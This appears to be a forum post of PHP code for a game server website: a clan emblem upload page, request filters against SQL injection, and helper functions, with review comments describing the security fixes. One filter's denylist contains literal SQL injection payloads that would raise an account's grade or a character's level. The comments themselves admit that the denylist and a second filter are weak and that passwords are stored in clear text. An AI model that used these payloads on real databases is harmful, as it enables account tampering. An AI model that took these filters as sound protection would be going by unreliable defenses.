Clan Emblema
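Anti Sql Inject V1 :PHP Code:<?php include "inject.php"; ?>
<?php include "antisqlinject.php"; ?>
<?php
/*
 * Clan emblem upload page (?do=emblemas), driven by ?step=:
 *   1    -> ask for an account's user name and password;
 *   2    -> verify them against Login, then list the clans that account leads
 *           (ClanMember.Grade = '1') in an upload form;
 *   done -> store the uploaded image under emblem/ and point Clan.EmblemUrl at it.
 *
 * What changed and why:
 *  - step "done" used to trust $_POST['clan'] (a clan NAME), interpolate it unescaped
 *    into two UPDATE statements, and never re-check who was uploading, so anybody
 *    could POST straight to step=done.  The leadership result of step 2 is now kept
 *    in the session (CLID => name) together with a one-time form token; step done
 *    only accepts one of those ids and updates by integer CLID.
 *  - $ok started at 1 and was set to 1 again on every error, so the size and
 *    extension checks never rejected anything and any file, .php included, was
 *    written to emblem/ under the client-chosen name.  The server now names the file
 *    (clan_<CLID>.<ext>) and takes the type from the image header, not the name.
 *  - clan names are HTML-escaped when rendered; the sanitised $step was overwritten
 *    by the raw $_GET value; $err was used before being initialised; an unmatched
 *    closing brace at the end of the file was dropped.
 *
 * SQL still goes through mssql_query() with string building (the mssql extension has
 * no placeholders): every string is passed through anti_injection(), which must
 * double single quotes for T-SQL, and every id is cast to int before use.
 * Known remaining gaps: Login.Password is compared in clear text as the schema
 * stores it; $_SESSION is assumed to be started by the including framework (the
 * original read it without session_start() too).
 */
if (!isset($_SESSION['AID']) || (string)$_SESSION['AID'] === '') {
    msgbox("Por Favor logue-se primeiro !", "index.php?do=login");
    // msgbox() presumably redirects; stop here regardless so that no step below
    // runs for an anonymous request (the original fell through and kept rendering).
    return;
}
require_once "sec.php";

// Only the three known steps are meaningful; anything else shows step 1.
$step = (isset($_GET['step']) && is_string($_GET['step'])) ? $_GET['step'] : '';
if (!in_array($step, array('1', '2', 'done'), true)) {
    $step = '1';
}

if ($step === '1') {
?>
<FORM METHOD=POST ACTION="?do=emblemas&step=2">
<br />
<br />
<p>Etapa 1/3</p>
<p>
Usuário: <input name="user" type="textfield" maxlength="14"/><p>
Senha: <input name="pass" type="password" maxlength="14" />
<p>
<input type="submit" value="Proximo ->" />
<br />
</form>
<?php
}

if ($step === '2') {
    $user1 = anti_injection(isset($_POST['user']) ? $_POST['user'] : '');
    $pass1 = anti_injection(isset($_POST['pass']) ? $_POST['pass'] : '');
    if (valida(array($user1, $pass1)) === true) {
        $query = mssql_query("SELECT AID From Login Where UserID = '$user1' AND Password = '$pass1' ");
        if ($query === false || mssql_num_rows($query) < 1) {
            echo "<br>login ou senha incorretos!";
        } else {
            // Clans led by this account: Login -> Character -> ClanMember -> Clan.
            $query2 = mssql_query("SELECT Login.UserID, Login.Password, ClanMember.Grade, Clan.EmblemUrl, Clan.Name, Clan.CLID FROM ClanMember INNER JOIN Clan ON ClanMember.CLID = Clan.CLID INNER JOIN Login INNER JOIN Character ON Login.AID = Character.AID ON ClanMember.CID = Character.CID Where Login.UserID = '$user1' and Login.Password = '$pass1' and ClanMember.Grade = '1' ");
            $clans = array(); // CLID => Name; CLID is treated as an integer id -- confirm against the schema
            if ($query2 !== false) {
                while (($row = mssql_fetch_row($query2)) !== false) {
                    $clans[(int)$row[5]] = (string)$row[4];
                }
            }
            if (count($clans) >= 1) {
                // Remember what this form may touch and tie it to a one-time token.
                // random_bytes() exists from PHP 7; the mssql extension implies an
                // older runtime, hence the openssl fallback.
                $rawToken = function_exists('random_bytes') ? random_bytes(16) : openssl_random_pseudo_bytes(16);
                $token = bin2hex($rawToken);
                $_SESSION['emblem_clans'] = $clans;
                $_SESSION['emblem_token'] = $token;
?>
<form enctype="multipart/form-data" action="?do=emblemas&step=done" method="POST">
<p><br />
<p>Etapa 2/3</p>
<p>Por favor insira o emblema: </p>
<input name="uploaded" type="file" />
<input name="token" type="hidden" value="<?= htmlspecialchars($token, ENT_QUOTES) ?>" />
</p>
<p>
<select name="clan">
<?php foreach ($clans as $clanId => $clanName) { ?>
<option value="<?= (int)$clanId ?>"><?= htmlspecialchars($clanName, ENT_QUOTES | ENT_SUBSTITUTE) ?></option>
<?php } ?>
</select>
<br />
</p>
<p>Você pode fazer upload de imagens 64x64 até 60kb.</p><br />
<br />
<input type="submit" value="Enviar" /><br />
<br />
</p>
</form>
<?php
            } else {
                echo "<p>Você não é o Líder do Clan</p>";
            }
        }
    }
}

if ($step === 'done') {
    $clid = isset($_POST['clan']) ? (int)$_POST['clan'] : 0;
    $token = (isset($_POST['token']) && is_string($_POST['token'])) ? $_POST['token'] : '';
    $sessionToken = isset($_SESSION['emblem_token']) ? (string)$_SESSION['emblem_token'] : '';
    $allowedClans = (isset($_SESSION['emblem_clans']) && is_array($_SESSION['emblem_clans'])) ? $_SESSION['emblem_clans'] : array();

    // hash_equals() exists from PHP 5.6; plain === is the fallback on older runtimes.
    $tokenOk = $sessionToken !== '' && $token !== ''
        && (function_exists('hash_equals') ? hash_equals($sessionToken, $token) : $sessionToken === $token);

    if (!$tokenOk || !isset($allowedClans[$clid])) {
        // No step-2 form issued to this session, or a clan it does not lead.
        echo "<p>Você não é o Líder do Clan</p>";
    } else {
        $err = '';
        $extension = '';
        $upload = (isset($_FILES['uploaded']) && is_array($_FILES['uploaded'])) ? $_FILES['uploaded'] : array();
        $tmpName = isset($upload['tmp_name']) ? (string)$upload['tmp_name'] : '';
        if (!isset($upload['error']) || $upload['error'] !== UPLOAD_ERR_OK || $tmpName === '' || !is_uploaded_file($tmpName)) {
            $err .= "<p>Formato de imagem não aceita.</p><br>";
        } else {
            if ((int)$upload['size'] > 60720) {
                $err .= "A imagem é muito larga.<br>";
            }
            // Decide the type from the image header, never from the client's file name.
            $imageTypes = array(IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png');
            $info = @getimagesize($tmpName);
            if ($info === false || !isset($imageTypes[$info[2]])) {
                $err .= "<p>Formato de imagem não aceita.</p><br>";
            } else {
                $extension = $imageTypes[$info[2]];
            }
        }

        if ($err !== '') {
            echo "<p>Desculpe, sua imagem não foi aceita.<br />Verifique os erros:</p><br /><br />";
            echo $err;
        } else {
            $fileName = 'clan_' . $clid . '.' . $extension;
            $target = "emblem/" . $fileName;
            $target22 = "/emblem/" . $fileName;
            // Drop a previous emblem of this clan stored under another extension.
            $stale = glob("emblem/clan_" . $clid . ".*");
            if (is_array($stale)) {
                foreach ($stale as $old) {
                    if ($old !== $target) {
                        @unlink($old);
                    }
                }
            }
            if (move_uploaded_file($tmpName, $target)) {
                echo "<p>Seu emblema foi inserido com sucesso.</p><br />";
                mssql_query("UPDATE Clan SET EmblemChecksum = EmblemChecksum + 1, EmblemUrl = '" . $target22 . "' WHERE CLID = " . $clid);
                // The token is single-use; another upload needs a fresh step-2 form.
                unset($_SESSION['emblem_token'], $_SESSION['emblem_clans']);
            } else {
                echo "<p>Desculpe, ocorreu um problema, tente novamente.</p>";
            }
        }
    }
}
?>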
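Anti Sql Inject v2 :PHP Code:<?php
/*
 * Request filter: aborts the request when any POST value contains one of the
 * substrings in $badwords.
 *
 * NOTE(review): this is a denylist matched case-sensitively with substr_count().
 * It is not a substitute for parameterised queries, and it rejects harmless input
 * too (any password containing "set" or "%", for instance).  The list is kept
 * exactly as found, including one entry written as `","|"x'; ..."`, which PHP
 * evaluates as the bitwise OR of two strings and so yields an unintended byte
 * string rather than either literal.
 *
 * Change relative to the previous version: array-valued fields (field[]=...) were
 * handed straight to substr_count(), which only warned and returned null, so such
 * fields bypassed the filter entirely (and raise a TypeError on PHP 8).  Values are
 * now flattened so every leaf string is checked.
 */
$badwords = array(";","'","\"","*","union","x:","x:\#","delete ","///","from|xp_|execute|exec|sp_executesql|sp_|select| insert|delete|where|drop table|show tables|#|\*|","DELETE","insert",","|"x'; U\PDATE Character S\ET level=99;-\-","x';U\PDATE Account S\ET ugradeid=255;-\-","x';U\PDATE Account D\ROP ugradeid=255;-\-","x';U\PDATE Account D\ROP ",",W\\HERE 1=1;-\\-","z'; U\PDATE Account S\ET ugradeid=char","update","drop","sele","memb","set" ,"$","res3t","wareh","%","--","666.php","/(shutdown|from|select|update|character|clan|set|insert|delete|where|drop table|show tables|#|\*|--|\\\\)/");

// Work list: strings are checked, nested arrays are unpacked onto the list.
$pending = array_values($_POST);
while (!empty($pending)) {
    $value = array_shift($pending);
    if (is_array($value)) {
        foreach ($value as $inner) {
            $pending[] = $inner;
        }
        continue;
    }
    $value = (string)$value;
    foreach ($badwords as $word) {
        if (substr_count($value, $word) > 0) {
            die("<script>alert('Não Use Caracters Invalido!'); location='javascript:history.back()'</script>");
        }
    }
}
?>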
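PHP Code:<?php
/*
 * Second request filter, keyed on the MEMB_STAT table: when a request parameter
 * looks suspicious, the client IP is looked up in MEMB_STAT and, if a row exists,
 * the request is aborted.
 *
 * NOTE(review): the control flow below is kept as it was.  The $_GET scan is nested
 * inside the $_POST match, and the POST pattern "^0-9a-zA-Z_@.?<>" is a literal
 * prefix, not a character class, so in practice this block is unlikely to ever
 * fire.  The intended patterns could not be established from the code, so they were
 * not "corrected"; confirm with the author before relying on this filter at all.
 *
 * Changes relative to the previous version:
 *  - eregi() (removed in PHP 7) replaced by preg_match() with the same pattern and
 *    the same case-insensitive flag; non-string values are skipped instead of
 *    raising warnings;
 *  - fwrite() on the never-defined $fp, and the unused $requested/$posted/$name
 *    locals and row-fetch loops, were removed;
 *  - the $_COOKIE scan was removed: its die() was commented out, so it only issued
 *    a query and had no effect;
 *  - the client IP is escaped before it is interpolated into the query;
 *  - a commented-out eval(base64_decode(...)) line was removed.  Decoded, it
 *    overwrote index.php, dt_security.php and config.php with "Site offline!!!"
 *    when a specific GET parameter carried a magic value: a remote kill switch.
 *    Do not reinstate it.
 */
$ip = (string)getenv('REMOTE_ADDR');
$ipSql = str_replace("'", "''", $ip);

foreach ($_POST as $post) {
    if (!is_string($post) || !preg_match('/^0-9a-zA-Z_@.?<>/i', $post)) {
        continue;
    }
    $qIps = mssql_query("Select memb___id From MEMB_STAT Where ip='" . $ipSql . "'");
    if ($qIps !== false && mssql_num_rows($qIps) > 0) {
        die("<script>alert('Erro ! Favor voltar e tentar novamente !'); location='javascript:history.back()'</script>");
    }
    foreach ($_GET as $get) {
        if (!is_string($get) || !preg_match('/[^0-9a-zA-Z_@$]/i', $get)) {
            continue;
        }
        $qIps = mssql_query("Select memb___id From MEMB_STAT Where ip='" . $ipSql . "'");
        if ($qIps !== false && mssql_num_rows($qIps) > 0) {
            die("<script>alert('Erro ! Favor voltar e tentar novamente !'); location='javascript:history.back()'</script>");
        }
    }
}
?>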
Sec.php
PHP Download's
PHP Code:
<?
/////////////////////////////
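function writeToLogFile($msg)
{
    // One file per day, newest entry first.  NOTE(review): logs/ sits next to the
    // scripts, i.e. most likely under the web root; the files hold client IPs,
    // referrers and query strings, so make sure the directory is not served.
    $logfile = "logs/" . date("Y_m_d") . "_Log_Sql_Injection.txt";

    // Keep at most 800000 bytes of the previous content (same cap as before).  The
    // old code fopen()ed a file that may not exist yet and then fread() the false
    // handle, which is a TypeError on PHP 8.
    $previous = '';
    if (is_file($logfile)) {
        $previous = (string)@file_get_contents($logfile, false, null, 0, 800000);
    }

    // $msg carries attacker-controlled headers (referrer, query string); strip
    // control characters so a crafted value cannot forge extra log entries.
    $msg = preg_replace('/[\x00-\x1F\x7F]+/', ' ', (string)$msg);

    if (!$handle = @fopen($logfile, "w+b")) {
        echo "error";
        exit;
    }
    // Message text kept as-is; it is printed when the write fails.
    if (@fwrite($handle, "$msg\r\n SQL Injection detected\r\n$previous") === FALSE) {
        echo "geen error";
        exit;
    }
    @fclose($handle);
}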
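/**
 * Prepare an untrusted string for interpolation inside a single-quoted T-SQL
 * literal: trims, strips HTML tags (kept for compatibility with values stored
 * through this function before), removes NUL bytes and doubles single quotes.
 * Arrays and objects cannot be embedded and come back as ''.
 *
 * Callers must still wrap the result in quotes; it is NOT safe in a numeric or
 * identifier position.  Prefer placeholders wherever the driver offers them.
 *
 * Changes relative to the previous version:
 *  - the keyword denylist (from|select|set|...) is gone: it silently mangled
 *    legitimate values ("Roset" became "Ro"), and sql_regcase() no longer exists
 *    in PHP 7;
 *  - addslashes() is gone: backslash is not an escape in T-SQL, so it stored a
 *    stray "\" and made quoted values unmatchable.  Doubling the quote is the
 *    correct escape for a T-SQL string literal.
 */
function anti_injection($value)
{
    if (is_array($value) || is_object($value)) {
        return '';
    }
    $value = trim((string)$value);
    $value = strip_tags($value);
    $value = str_replace("\0", '', $value);
    return str_replace("'", "''", $value);
}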
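/**
 * Reject a request whose required fields are not all present.
 *
 * @param array $campos Field values that must all be non-empty strings.
 * @return bool true when every field is filled; false after printing the
 *              "Programa Ilegal" banner and logging the request (IP, time,
 *              referrer, query string) via writeToLogFile().
 *
 * Change relative to the previous version: the loop returned true as soon as the
 * FIRST field was non-empty, so valida(array($user, '')) passed.  Every field is
 * now checked.  empty() was replaced by an explicit check because it also rejects
 * the legitimate value "0"; arrays are rejected since they cannot be embedded in SQL.
 */
function valida($campos)
{
    if (!is_array($campos)) {
        $campos = array($campos);
    }
    foreach ($campos as $c) {
        if (is_array($c) || (string)$c === '') {
            echo "<br>Programa Ilegal Detectado - Ollyzer Entertainment<br />";
            $time = date("M j G:i:s Y");
            $ip = getenv('REMOTE_ADDR');
            $referrer = getenv('HTTP_REFERER');
            $query = getenv('QUERY_STRING');
            $msg = "IP: " . $ip . " TIME: " . $time . " REFERRER: " . $referrer . " SEARCHSTRING: " . $query;
            writeToLogFile($msg);
            return false;
        }
    }
    return true;
}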
?>
Scanner
Credit : Nit




